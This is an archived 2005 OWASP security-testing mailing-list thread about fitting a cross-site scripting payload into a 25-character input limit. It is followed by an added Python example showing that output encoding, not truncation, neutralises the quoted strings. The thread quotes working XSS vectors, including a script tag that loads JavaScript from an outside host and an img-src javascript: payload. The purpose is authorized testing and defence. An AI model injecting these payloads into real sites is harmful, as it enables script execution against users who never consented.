[OWASP-TESTING] XSS in 25 characters or less

Stephen Venter stephen.venter at gmail.com
Wed May 18 23:11:49 EDT 2005


Yeah, quite right... well, almost - just needed a space and an extra slash:
<img src=javascript:alert() />


On 5/19/05, Alex Smolen <alsmola at yahoo.com> wrote:
> <html>
> <head>
> </head>
> <body>
> <img src=javascript:alert()>
> </body>
> </html>
> 
> This should work in Internet Explorer
> --- Stephen Venter <stephen.venter at gmail.com> wrote:
> > Eoin
> >
> > I tried setting up a symbolic link with only a single character to a
> > js file and an html file on my website... but the domain name is still
> > too long for your 25 char restriction.  However, strictly speaking,
> > I'd say that, if all you need is to prove susceptibility to XSS, then
> > you could use something simple like inputting text with HTML bold
> > tags... would you agree? Although that does obviously not demonstrate
> > the risk quite as nicely.
> >
> > Anyway, here are some XSS examples I like to use:
> > http://whoozoo.co.uk/XSS-test.htm
> > or: the symlink to that html file is:
> > http://whoozoo.co.uk/x [works ok for XSS so long as the client is using IE]
> >
> > There you will see links to the js file that I symlinked to the single
> > char "j".
> >
> > Alex, can you show a working example of using "img src=" in the way
> > you describe?
> >
> > Regards
> > Steve
> >
> > On 5/18/05, Alex Smolen <alsmola at yahoo.com> wrote:
> > > Actually, you could include the <img src=tinyurl.com/whatever>
> > > and have the tiny url point to a java script somewhere.
> > >
> > > Do I get my pint?
> > > --- Alex Smolen <alsmola at yahoo.com> wrote:
> > > > You could use tinyurl.com to embed a malicious link
> > > > (say, one that executes an XST attack). This still
> > > > requires a window larger than 25 to get the domain to
> > > > execute a malicious XSS, I think.
> > > >
> > > > --- Eoin Keary <eoinkeary at hotmail.com> wrote:
> > > > > Hi,
> > > > > I have a window of 25 chars to perform an XSS exploit.
> > > > > Anything more is truncated by the server.
> > > > >
> > > > > <script src=http://a.com/z.js></script>
> > > > >
> > > > > - this is 39 chars
> > > > > We can do HTML injection ("<a href=....") to a degree but anyone any ideas
> > > > > on how to execute script in such a small window (25 chars)?
> > > > > We need to stay in the same domain (xyz.com) in order to make the attack
> > > > > useful. So redirecting to another domain with the
> > > > > "<a href..." is no good.
> > > > >
> > > > > First correct answer gets a pint of Guinness (Larry S, you're not included
> > > > > for the pint as I owe you too many).
> > > > >
> > > > > Eoin
> >
> 


-- 
Stephen Venter
Independent IT Security Consultant
stephen.venter at gmail.com
www.whoozoo.co.uk
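
The 25-character truncation discussed in this thread, compared with HTML-encoding on output, as an added example that is not part of the original messages. The function names and the literal `<b>xss</b>` probe are assumptions made for illustration; the other two strings are quoted from the thread.

```python
import html
from html.parser import HTMLParser

LIMIT = 25  # truncation window described in the thread

# The two strings quoted in the thread, plus a bold-tag probe of the kind
# Stephen suggests (the literal "<b>xss</b>" is constructed for this example).
SAMPLES = [
    "<script src=http://a.com/z.js></script>",
    "<img src=javascript:alert()>",
    "<b>xss</b>",
]

class TagCollector(HTMLParser):
    """Records each complete start tag found in a fragment."""

    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.tags = []

    def handle_starttag(self, tag, attrs):
        self.tags.append(tag)

def live_tags(fragment):
    # An unterminated tag counts as "no tag" here. That understates the risk,
    # because the rest of the real page follows the reflected value.
    collector = TagCollector()
    collector.feed(fragment)
    collector.close()
    return collector.tags

def reflect_truncated(value):
    """Weak control: cut to LIMIT characters and reflect as-is."""
    return value[:LIMIT]

def reflect_encoded(value):
    """Corrected control: same cut, then HTML-encode on output."""
    return html.escape(value[:LIMIT], quote=True)

def audit(samples=SAMPLES):
    """Per sample: (input length, tags after truncation, tags after encoding)."""
    return [(len(s), live_tags(reflect_truncated(s)), live_tags(reflect_encoded(s)))
            for s in samples]

if __name__ == "__main__":
    for row in audit():
        print(row)
```

The bold-tag probe passes through the length cut as live markup, so the cut alone does not stop the field from being interpreted as HTML; after encoding, no sample yields a tag.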



